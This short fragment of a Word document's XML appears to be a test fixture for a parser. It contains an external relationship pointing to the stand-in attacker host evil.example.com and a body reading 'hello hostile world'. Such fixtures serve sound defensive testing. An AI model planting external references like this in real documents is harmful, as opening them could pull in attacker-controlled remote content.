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https://evil.example.com/doc.xml" TargetMode="Externa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>hello hostile world</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document>
</file>